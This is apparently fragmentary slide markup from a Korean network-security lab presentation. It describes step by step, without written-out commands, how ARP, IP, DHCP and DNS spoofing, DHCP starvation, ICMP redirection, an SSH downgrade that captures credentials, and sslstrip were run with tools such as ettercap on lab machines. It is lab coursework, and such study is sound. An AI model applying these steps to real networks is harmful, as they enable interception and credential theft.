            <a:ext cx="9000202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공격이 제대로 이루어졌는지 확인하기 위해 공격대상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에서 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Gateway Ping test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BT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에서 공격대상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와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Gateway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가 서로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Ping test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하는 것을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Sniffing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ARP Spoofing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192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그림 1" descr="https://lh6.googleusercontent.com/7g-RS_cJ1W5rStuvTDslH8A751evu7P2aEDhh24TTXrJbHSAPZvDsER7_Pt66606N0Mco0BvDTdcCkpr1L5XJ5pf0tYqoeLN7EYbeJiNEaEGbAAeDfy4kubJ4vYvA_phYLSr9N0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119" y="801431"/>
            <a:ext cx="4275985" cy="251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5" name="그림 9" descr="https://lh4.googleusercontent.com/6zFj_WYfSPaw0HjLZsP751HOsOOR1Y1gTZn36jqSe5Zl6147zjFehgo604nmQC2yWa8MEmCcCarMV_fzyfqzgOYVrLt6h4Z7GeIdykU2QwKpFUFOgAp2B0EDmFAQCYfmk4nXICK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185" y="795202"/>
            <a:ext cx="4526602" cy="2518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666218" y="3427270"/>
            <a:ext cx="8703512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경영관리부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PC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이용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,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DNS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[10.10.100.20]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SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" b="1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접근</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1500" b="1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1500" b="1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가능 여부 확인</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR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16390" name="그림 50" descr="https://lh6.googleusercontent.com/8mvUWjpdEPLZeG4XzwcATJUwlNTv6h9CpoAMGsIEf7qI-s_2ylH6PfKiD9v-skmJEswWSsFnmK6YQx9_ro7Wy5nG3HmkiIcitnjM0nz08coCpj_5TWXL4p0HSTzWqSuQmZ_6f9W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873" y="3822087"/>
            <a:ext cx="4321081" cy="250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9" name="그림 51" descr="https://lh3.googleusercontent.com/NUptgCacT9FkhbQjiSFAvxJ_fQ9zDTQow-eS2nY0a9gNhAn_a4YJhSRZLMAnhgxQb4ZncB3-8Fg7OoKf0Ikpv26J6AYosk2eBfa5CFmOPfG4QwC2-2J1n5VeAqAlMoDXKGMDvIT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187" y="3808485"/>
            <a:ext cx="4516543" cy="249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0" y="43934"/>
            <a:ext cx="4945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ko-KR" altLang="en-US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29640" y="6285268"/>
            <a:ext cx="852993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BT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 경영기획부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PC[10.10.20.10]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의 주소를 가상 인터페이스에 부여 후 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="15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500" b="1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500" b="1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공격을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" b="1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위해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Gateway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에게 자신이 경영기획부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PC[10.10.20.10]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라고 속임</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR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IP Spoofing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569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그림 52" descr="https://lh4.googleusercontent.com/MxmDO0FqGdhdHI3NWeFiBq1LtSPg8kJhkN7BLFXgEkuDG54aA0TW3vlZYCSRc5Hl0bOMlFDoBjsqBoJnFqSvNO_dPh6xcZwSXBzQO0Z-RyQwFBbwNhOSHfcYu3G8xFw-bp9K9HM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375" y="1071460"/>
            <a:ext cx="4365849" cy="302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09" name="그림 53" descr="https://lh5.googleusercontent.com/w-9Y5bBi1ZyOUhiYaZTnNhKc_vMVJyaAaEOWLRmhArYicj9iI0jVWQp7hd49khsAjXwz99A6rTCjTfvtbpX-9NW_TAJY7FYfygwFrKGKMtVHIqKZSpy6FJ2ns7VTubntS5Veev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548" y="1071460"/>
            <a:ext cx="4658899" cy="302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362855" y="4444494"/>
            <a:ext cx="8090676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BT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에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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ssh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–b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옵션을 이용해 가상 인터페이스에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부여한 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경영기획부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PC[10.10.20.10]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아이피로 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DNS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[10.10.100.20]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 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SSH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로 접근하고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DNS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서버에서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SSH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접속 현황을 확인했을 때 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경영기획부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 [10.10.20.10]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으로 로그인 되었다는 것을 볼 수 있음</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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IP Spoofing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663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그림 54" descr="https://lh3.googleusercontent.com/6gBx0Cq-oeY7pDTccrf213OP4liW-cD3G7wMOgWn5-hW7t3HbQ56CvzxnHjcdfVJBDBASdcfzmA5bzUEgWw_ZoD-YXuGxrKxZ6q3dFgryhv72VnhKAzoYKmi7Y7x51CRaVXieWB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935" y="1289711"/>
            <a:ext cx="4389258" cy="319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3" name="그림 55" descr="https://lh5.googleusercontent.com/njcg_wXnSd59scWeMaIZMrH2oLNfVsC_yJ5fW0AbFag-wvyYzAXNWfoKALLvQugmtFMjwso5W0lFGiCE1f6tt3doDOlnd9HPK9JZ9GYXETPFe-rwNpZuLRkwUrYIk5z3Hv9GFKQ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368" y="1289711"/>
            <a:ext cx="4226319" cy="319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474585" y="4791553"/>
            <a:ext cx="705032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경영기획부 직원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에서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DHCP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서비스 이용</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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-&gt;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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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아이피를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제대로 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할당 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받아오는지 확인 후 공격자가 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 BT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에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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ettercap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툴을 이용해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DHCP Spoofing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 시도</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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0" y="73152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DHCP Spoofing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667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8" name="그림 56" descr="https://lh5.googleusercontent.com/Bk0iY5Xdqx8eGHWgmt2EC1DU0FtmlOmTFiuzSD3dWjXN_FYG7e6bNWORsEYR5CuzR9EHsxUsMqkep568MqJvs2AgblpTse62SUOVINHRJ6yg36mK4vEPkmELW1gqLUIimJZy47g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152" y="1138935"/>
            <a:ext cx="4229374" cy="333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7" name="그림 57" descr="https://lh5.googleusercontent.com/4PoVPNYIZmwVFGcGoAi8-N-Gs02EB0IX55ioJqcpXMAd_bkXN4GIW7RfUx9iKqx1JhyEj-_1iX64EO9zgZxBxiZRx1uO6Pa_Ux5iMYKhXjB5265e1uzGqCXaai9P84vnVU5jWGy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421" y="1109091"/>
            <a:ext cx="4110639" cy="336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735152" y="4779238"/>
            <a:ext cx="9315678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공격대상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에서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DHCP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서버를 이용해 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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아이피를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할당 받으면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BT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에서 설정한 대로 받아오는 것을 볼 수 있음</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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DHCP Spoofing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348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B951E7FC-41FB-4067-A986-D3FA99485F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63" r="896"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3319598" y="864848"/>
            <a:ext cx="7606194" cy="684819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="그림 1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1A7F3822-573D-48A6-B5E0-5156CE44A7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814" y="1684627"/>
            <a:ext cx="3781493" cy="2467829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="그림 1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4CDAAFFE-222B-4A03-B02D-A90EF84FA7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913" y="2040314"/>
            <a:ext cx="3981072" cy="1258722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 1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A0753ABE-C0EF-4A25-B756-C642DC3506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813" y="4152456"/>
            <a:ext cx="3781493" cy="2491829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="그림 1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290828C7-7C8F-42AF-A65A-1417E8ECD2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913" y="4474950"/>
            <a:ext cx="3981072" cy="15441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02856" y="11611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회사소개</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="24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722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그림 58" descr="https://lh6.googleusercontent.com/nDA4VS0tlengFDF9AklQlw3C5u_vfi5EIOESKhVnxXbFxPRpP1cE4qiGBQ3YwhDQDvwqrw2yQ9cWGZX8ir2tNaFFF45np7J6ETPj_Elh3cJzMYwOdeeVmjoJLyo6PQwpRI6A2Gk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903" y="976669"/>
            <a:ext cx="4253872" cy="225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7" name="그림 59" descr="https://lh3.googleusercontent.com/h3QSfxnMrZXUV2JpIdF-1Dnt7hRCWBMH0Hj1XA-bRBGJM_Kzsn8NV6dGwgQwh2mG37D3Wbc2JM6pPZhVgko_sRWWu5_Lb9ogcWhs9vlPydycZl9-iuNZPh4533Fl-TN9ETlfmi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933" y="976669"/>
            <a:ext cx="4299126" cy="225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 rot="10800000" flipV="1">
            <a:off x="2530903" y="3342034"/>
            <a:ext cx="9417052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공격을 한 뒤 확인을 위해 할당범위 재 설정을 하고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BT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에서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Ettercap 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툴을 이용해서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DHCP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서버에 공격 시도</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR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773677" y="-603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b="1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19461" name="그림 60" descr="https://lh4.googleusercontent.com/Sm27uZX8s5X7y5Z6R_gnKgG--jchBCxqZ4p8ugTzfxd13Mv0r4aFZE9UtmrHuJq_BqXH-8ow-WygP2nG4C_0hc_pWV7VjJHNWk7r2C3a6ghSv5xOuCDcLrW4E5If3pXuChFedje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21" y="3778515"/>
            <a:ext cx="8701238" cy="236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2530903" y="6252694"/>
            <a:ext cx="929231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BT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에서 공격 내용 확인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:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1500" b="1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BT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이 가지고 있는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10.10.20.20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을 제외한 나머지 주소들을 할당 받아 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" b="1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옴</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR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DHCP Starvation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60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그림 61" descr="https://lh5.googleusercontent.com/qDIE1dbskY1YPh-lUF9e6vNlBCMN0NHG_YZH_AMa7SNGTUoV1TbrM6Qs4kzzChV70xXYeBp1XxV-FzAnyTiBV7G9GzbflUmLy_7X7qijlbyy2mwkqiEu4MlHBak22-vrTuhvt_g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699" y="1244635"/>
            <a:ext cx="4439532" cy="321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5" name="그림 62" descr="https://lh4.googleusercontent.com/75k8sVtbKLnrmAvVqOxpKiur8g59TWdsYGmcoRagNBAg1e7TfAKbClVTvsqJo3X09RHUvX6RD30CD5Rxsw0Eicofmux4uL8_SvoREUf-Ybpy57ASF1llvDsq_6TiJb0kQSz19g-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768" y="1244635"/>
            <a:ext cx="4704428" cy="32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320036" y="4730878"/>
            <a:ext cx="896751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DHCP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서버로 이동해</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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IP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할당 내역 확인 후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,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XP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에서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DHCP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서버에게 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IP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를</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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할당 받음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-&gt;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DHCP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서버에서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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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할당 불가능</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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DHCP Starvation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415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그림 63" descr="https://lh5.googleusercontent.com/24W6epkiJodqRANH1Hz9TIrjIetv6rNZpKIx7V973GnpI-F4x2jE8VzzzOqFJ448Tl0jfoXY5jzHGS2ceekmcBvW0LHpwTU7gfLWZLxVQ_gt9wMm0pOkKDzhHLjKNYZ6k4Bu-Zf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472" y="898543"/>
            <a:ext cx="3760701" cy="252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29" name="그림 64" descr="https://lh6.googleusercontent.com/OF4X6maiCaYL13D7a2d6xLiRi4JN3XIgp8eyvAGOqvRFdKBHffD6RTMovYfRmEj7dvTFuaUNz_z-y8FcLdsNG82IMaJH0eNln1EDJWnJPDJxURvVEDabhU3WKQJj4IxxI8RAcn3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410" y="885565"/>
            <a:ext cx="4276390" cy="261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553472" y="3530054"/>
            <a:ext cx="876967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BT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에서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DNS Spoofing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공격을 위한 파일 생성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,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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경영기획부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를 대상으로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MITM    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상태 만들기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790414" y="11378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533" name="그림 65" descr="https://lh3.googleusercontent.com/-zZ3UYP8DGGAIJuONDESQZ8UDpnf8qH88-loCetD9BdWykTOCs1KdkfO7iGJue5pDpmt4FQRuuIngLlSJ-i-BJmokaQtjSzI9ohrpIymYXjBtMvhcQclrsx_jzFpJRor5h6ddW8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511" y="4383666"/>
            <a:ext cx="4441681" cy="218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7166906" y="4949245"/>
            <a:ext cx="441158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dnsspoof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툴을 이용해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DNS Spoofing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 시도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DNS Spoofing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684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그림 66" descr="https://lh6.googleusercontent.com/TxcxpzT3S17BOKQmE-ADVg8NPpojhwCmj34ieuKn85bOBSKcU3OfOiBMh3ramUUG29KHeNJ6LhrrH0I8kLIba8zJiAQG917VV3RRTrSS_mV8kVYYKwhxoWsvlgFy91mVu2L5bel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974" y="1079303"/>
            <a:ext cx="4680488" cy="322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3" name="그림 67" descr="https://lh4.googleusercontent.com/PwcCfJ4MEzk13goVgaLp7t1_6L8AbhMzalOKb57J05WqJsy3u7KvmH8iLZu51Sw00dBTKsUg3C_NPnqVC0zHA-QsONh0q_DJeimid5EShxdEuludFdqXaIjz4aBcIdjLkZ7F4R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714" y="1079302"/>
            <a:ext cx="4959458" cy="322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210865" y="4570651"/>
            <a:ext cx="792969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경영기획부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로 가서 공격이 제대로 이루어졌는지 확인 후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BT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에서 공격이 진행된 내용 확인</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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DNS Spoofing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859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그림 7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897" y="1464707"/>
            <a:ext cx="5570772" cy="371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7" name="그림 69" descr="https://lh3.googleusercontent.com/yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzNDT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797" y="1464707"/>
            <a:ext cx="3916162" cy="371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520025" y="897936"/>
            <a:ext cx="390965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방향 전환 요청이 꺼져있을 경우</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR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359380" y="5519252"/>
            <a:ext cx="713610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공격대상의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PC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로 가서 방화벽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ICMP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설정에 방향 전환 요청에 체크가 되어 있는지 확인 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ICMP Redirection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463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그림 71" descr="https://lh6.googleusercontent.com/DsUvelmkbrggNzbHyBewAuqs3_jybz5NeUuUgmjJGWZxkA1uTQh5pScueA_ImEg3eFsD8QX_KT5U_zfHVDoWnONjpPVLpNOjTHH_kaV6qH6XX7gf7HsqWEe5_JcVvssXoTkjYoR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513" y="842573"/>
            <a:ext cx="4711485" cy="301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그림 72" descr="https://lh6.googleusercontent.com/Ml9Ci26N0DzDidFyyTD8WahjX6hv2ArUOOohzr_VgRIzXv_YaU7jCrnEx1Y5R9NyD_9Me2mWw7ByDdQ8M_SiHac9drRt1lx2-RY0yq6L_J41xoBQKq4EUIfNfeprQzK1zSd9BJG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715" y="861609"/>
            <a:ext cx="4432516" cy="299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1" name="그림 73" descr="https://lh3.googleusercontent.com/yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzNDT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513" y="4350682"/>
            <a:ext cx="4294171" cy="240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-1049154" y="15872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2649606" y="3923522"/>
            <a:ext cx="817615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BT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으로 가서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Forwarding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을 하고 </a:t>
            </a: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icmpush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툴을 사용해 공격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6737684" y="4737905"/>
            <a:ext cx="673632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다시 공격대상의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PC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로 돌아와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Routing Table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을 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확인해보면 변동이 없는 것을 볼 수 있음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ICMP Redirection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634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그림 74" descr="https://lh4.googleusercontent.com/v4zxhSbnaTuM8sMSjSxJirmrEL6Kk_MOQTU7ZqaT6pBtFKGOIKRDzslKmx1bCwaKNDp0oocdRiiipmrr6X1y_H2lxaKSboPc3tI9OgvO78WFG7Ze6Wq3IKKQ6QFgrL1THqCbTC2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32" y="1457575"/>
            <a:ext cx="5713211" cy="356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5" name="그림 75" descr="https://lh3.googleusercontent.com/yNLqroOAI9Blbu-XcqLZoDmB1nPD567Rk1WZBSwH_9tTzzsoq5TOhhFcJOGFOSH5tohjkviaK4O2fo5J43e1jLJ4w_w_98_lO_Gymt42rVus9JmLH2gd7Ob5YRbH9Ynt8xpzNDT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307" y="1457575"/>
            <a:ext cx="3290513" cy="356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597441" y="960198"/>
            <a:ext cx="8621729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방향 전환 요청이 켜져 있을 경우</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="ko-K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251686" y="5521764"/>
            <a:ext cx="534850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공격대상의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PC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로 가서 방화벽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ICMP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설정에 방향 전환 요청에 체크가 되어 있는지 확인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ICMP Redirection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575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그림 76" descr="https://lh6.googleusercontent.com/DsUvelmkbrggNzbHyBewAuqs3_jybz5NeUuUgmjJGWZxkA1uTQh5pScueA_ImEg3eFsD8QX_KT5U_zfHVDoWnONjpPVLpNOjTHH_kaV6qH6XX7gf7HsqWEe5_JcVvssXoTkjYoR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617" y="814885"/>
            <a:ext cx="3925317" cy="256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49" name="그림 77" descr="https://lh6.googleusercontent.com/Ml9Ci26N0DzDidFyyTD8WahjX6hv2ArUOOohzr_VgRIzXv_YaU7jCrnEx1Y5R9NyD_9Me2mWw7ByDdQ8M_SiHac9drRt1lx2-RY0yq6L_J41xoBQKq4EUIfNfeprQzK1zSd9BJG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416" y="821411"/>
            <a:ext cx="4337956" cy="2555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657600" y="821411"/>
            <a:ext cx="6385302" cy="67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168775" y="2632137"/>
            <a:ext cx="6385302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847075" y="3377375"/>
            <a:ext cx="71958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BT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으로 가서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Forwarding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을 하고 </a:t>
            </a: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icmpush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툴을 사용해 공격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27655" name="그림 78" descr="https://lh6.googleusercontent.com/OdGMdT8U5j_H-2TSV9KQMUxqwc037LvSBP5zka1MsRhan8NBWayIrsFoA1ettts4Hh1H6FN_UvC9zEw9D0MUw3RkmlLgpqoY0UBz3hoFtl0z63BrMSf1SyqXKdRcGgdbR_IzUl3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617" y="3754688"/>
            <a:ext cx="3925317" cy="243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그림 79" descr="https://lh4.googleusercontent.com/Fqb9vlCHJb6F4LiSFO5SZhxEIyPXssZRVKxfKb24wnlrg3YCPU4ZijUxIy_fwkWWyTZd8DM6PvsQDDMMJEEHeFZBVu4GBJLEcA93lj8-sfN_yyRIlu_1zfgkImhdvIE6J6CAepC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097" y="3758184"/>
            <a:ext cx="3915699" cy="243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-1"/>
            <a:ext cx="6391922" cy="467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511175" y="1740876"/>
            <a:ext cx="6391922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3051208" y="6262635"/>
            <a:ext cx="8373979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경영기획부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 Routing Table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" b="1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 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공격한 내용이 테이블에 추가</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="15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BT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에서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Packet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을 볼 수 있는지 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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확인하기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위해 공격대상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로 외부에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Ping test</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR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51686" y="103381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ICMP Redirection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105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그림 80" descr="https://lh4.googleusercontent.com/i5bu6kPipwyEZQsU4uUK-0ziLvnxsJk3uRxCsAy9p3jEnN0mNXKOh76r4NmYFbrDXnS4GcOaUvyCmVfhDLz4lwRcOc5WGeMWtKLUE3bmwa7iIZOMYvK41IFx9X8rgN2dHd7Etdm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885" y="1391080"/>
            <a:ext cx="4502432" cy="3504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3" name="그림 81" descr="https://lh5.googleusercontent.com/ECnMVCjZ1yT5-slySAkW5C7pvceGOXP0slF-07sFvRMo04CLDbckGQjX4_Jk2A4sFV9bBQECgQqDiiNH1G-WVRO06PRunUkdAexsnGcKPkGcVD5vsJWPLjtsRoxoLgYDbECfrs9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324" y="1391079"/>
            <a:ext cx="4524219" cy="343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5517397" cy="145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11175" y="1658326"/>
            <a:ext cx="5517397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799042" y="5263568"/>
            <a:ext cx="697456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BT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으로 확인했을 때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Forwarding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이 제대로 되는지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, Wire Shark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로 확인했을 때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Packet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들이 제대로 잡히는지 확인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51686" y="103381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ICMP Redirection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92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그림 82" descr="https://lh4.googleusercontent.com/c22sNTr_cCgkjQaHQWa4EBrx_uu88zgOi7ODeFYITLb4sXrpPpmqJVHFBMWpVNPRFX1pAoLywjm04HXyQKv_Q3NOd0Px70_xmcb3L-CoQNUDmiVt8bOxWNSxjpMd6srt_mteBVjJ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34" y="1062537"/>
            <a:ext cx="4218983" cy="272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7" name="그림 83" descr="https://lh4.googleusercontent.com/dFNKgWutywzPiU8iSaI03-rxhRRQ_Jfi1EoosZdnNAky01rk4UdZC_94retn0QmFnu5puD5hSbkTKgREZ3IRvrRfE-gIQVC4lWxCejHAlP8-qzLG9zYNado0f-Vgi-2Bu8kjXnj-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573" y="1062537"/>
            <a:ext cx="4689333" cy="276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08000" y="1620226"/>
            <a:ext cx="623031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755254" y="3826898"/>
            <a:ext cx="74523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SSH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버전 협상 시 버전 정보 변경을 하기 위한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filter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파일 생성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566580" y="392807"/>
            <a:ext cx="8028122" cy="147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9702" name="그림 84" descr="https://lh5.googleusercontent.com/DvrcL77bN4-B5r7S1OqybDCAsLOM3VIuTV5ItJbYyf9OfpJ8kzJSJn0gfPqvydjSlwtBte805VGB7_IfyqnfwSZPnTby3OoT_tLiL3Sni7oHmikpdU2XGaKi1LeTgIUma6Z3dTL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34" y="4262836"/>
            <a:ext cx="4204212" cy="25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8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6823546" y="4880784"/>
            <a:ext cx="482709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Ettercap </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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툴과 만든 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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etter.filter.ssh.co </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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필터 파일을 이용해 경영기획부 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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 공격</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR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51686" y="103381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SSH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취약점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638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04CD30BC-DBED-4BAB-AA9A-CD0FC330E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856" y="2461317"/>
            <a:ext cx="6005686" cy="4263029"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6" descr="스크린샷, 지도, 텍스트이(가) 표시된 사진&#10;&#10;높은 신뢰도로 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{E74A0AEA-486E-41F3-AA58-C1424837A4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568" y="987590"/>
            <a:ext cx="4233950" cy="1317489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84E10EDB-C2F4-4092-9781-F33C7DFE5F90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8908542" y="3642311"/>
            <a:ext cx="2376819" cy="3032493"/>
            <a:chOff x="9632620" y="3883275"/>
            <a:chExt cx="1909747" cy="2436574"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="그림 8" descr="무대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99126E19-D40A-469C-81AB-044A14689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2620" y="3883275"/>
              <a:ext cx="1909747" cy="2436574"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="그림 9" descr="사진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D9AC961C-CFE4-4C04-9259-C8DAC9E3B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6389" y="4396662"/>
              <a:ext cx="1801229" cy="1798557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00E0CAF7-BAA1-44A4-BFAE-C6002209E6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863" y="2554322"/>
            <a:ext cx="2400300" cy="1009650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="그림 11" descr="개체이(가) 표시된 사진&#10;&#10;높은 신뢰도로 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{D1B10258-AEDC-46E4-84AB-E3549DB8A5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143" y="1161968"/>
            <a:ext cx="2751556" cy="71516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02856" y="11611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회사소개</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="24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138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그림 85" descr="https://lh6.googleusercontent.com/bxBh1L7bd28mlbiv9y7jHCDb0dozeOf0AvZonYQgcysFZgdLMNaPkD6eU6zPO1fRl4hb6FSnUoD1nZwI9jpjyhHHVadlXzG6ruJcWU17Ho0dZGAZ9ULDrz_hmWx2l40MFrASpW6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512" y="1737919"/>
            <a:ext cx="2462845" cy="322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그림 86" descr="https://lh4.googleusercontent.com/rxa3uQh8mpa6lteN-ksynsZlF9efCM33BAdtIimUV-BcpjatRMn8HnpTxTA6CuAa7JCWQx-lwhTHXyKKQLqpgHcwOFfB57xe8AakQ7J-OoEaI4FsNHY8NtEtSQwMRuh6D_zdCAq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217" y="1743159"/>
            <a:ext cx="2808692" cy="322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1" name="그림 87" descr="https://lh6.googleusercontent.com/QGzadvsIWEPStnIIQCNxQ3aECCCARjf31o2C0utPxbwHTUnYN8tcrNU4HxlzWlznseChtH3I1ZLHqzEec1miJeo7EWaR2jQUwU_xNnZaNGWTHw6qAeIjeUryfX2LtY6olfDp0y_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843" y="1737919"/>
            <a:ext cx="2871573" cy="322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-297374"/>
            <a:ext cx="6137329" cy="754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 flipV="1">
            <a:off x="511175" y="1861526"/>
            <a:ext cx="613732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 flipV="1">
            <a:off x="511175" y="3398226"/>
            <a:ext cx="613732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2852935" y="5388967"/>
            <a:ext cx="737275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 확인을 위해 경영기획부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에서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DNS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서버로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SSH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접속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0" y="0"/>
            <a:ext cx="6865749" cy="666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511175" y="1677376"/>
            <a:ext cx="686574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51686" y="103381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SSH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취약점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625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-297374"/>
            <a:ext cx="6137329" cy="754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 flipV="1">
            <a:off x="511175" y="1861526"/>
            <a:ext cx="613732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 flipV="1">
            <a:off x="511175" y="3398226"/>
            <a:ext cx="613732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29" name="그림 106" descr="https://lh4.googleusercontent.com/yhCfNrkyhIQhYU0IDP0KpR2QCGZplBllF2aTb3pbyZuJ1WOmIlR6qvSp8bT29EsAlVHs59wEtkEBpBg1mXdyDdcD1UHkC6hQl8BkuvQd62YzV-QAFUGzduIbeQZ-M3iT-kA-XN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447" y="1384919"/>
            <a:ext cx="4379494" cy="338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8" name="그림 107" descr="https://lh3.googleusercontent.com/RIlC0BUhDq8X9-OYF1yF1u9tz3YkB71Jb1VhzKtvgnbGO0qEd1uK8-12ytqgIp_S78GqzAfTXn8kvoiTjmw7m9LkBvIUp8-BeCTUqpfe8rT723zSHvL7kCfXsJUV7ktTAdjYNFz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435" y="1409285"/>
            <a:ext cx="4538208" cy="3432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0" y="0"/>
            <a:ext cx="6865749" cy="666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511175" y="1677376"/>
            <a:ext cx="686574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2423659" y="5025656"/>
            <a:ext cx="912856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버전</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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다운그레이드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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확인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경영기획부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에서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DNS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서버로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SSH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접속 시 사용했던 아이디와</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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비밀번호</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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확인 가능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51686" y="103381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SSH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취약점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02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그림 108" descr="https://lh4.googleusercontent.com/7LvD6Qj1cODS_BrQud3a3-FhplHz-f4h5Ao_N86EiFdEHRmEBB3Neb8nlzZLgqRd1x2fA_jN2a6awAxig6FHSv3IEMS8U2g-lRlG8pTe3ubk1AksNxhWbKex3TmrCbfpUx0pyFb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184" y="945389"/>
            <a:ext cx="4390507" cy="387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5" name="그림 109" descr="https://lh6.googleusercontent.com/ORvtO_1J0BDkBBn_Jordq4kJCxKkzxaTaTQptBw_xRQoiBMKCH21rAUAS0EP7DoQNB4Z4gG-dT1ETcDrilv2lwEFS57H6MxxP0KgVjpdE9VFnZmQFR5jjgOuGQs-bne2Lu7o0C1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725" y="1009363"/>
            <a:ext cx="4479010" cy="381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607661" y="3624028"/>
            <a:ext cx="796612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4026785" y="5110267"/>
            <a:ext cx="796612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 시도에 앞서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TLS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가 제대로 작동하는지 확인 후 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 SSL strip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공격을 위한 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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sslstrip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툴 설치</a:t>
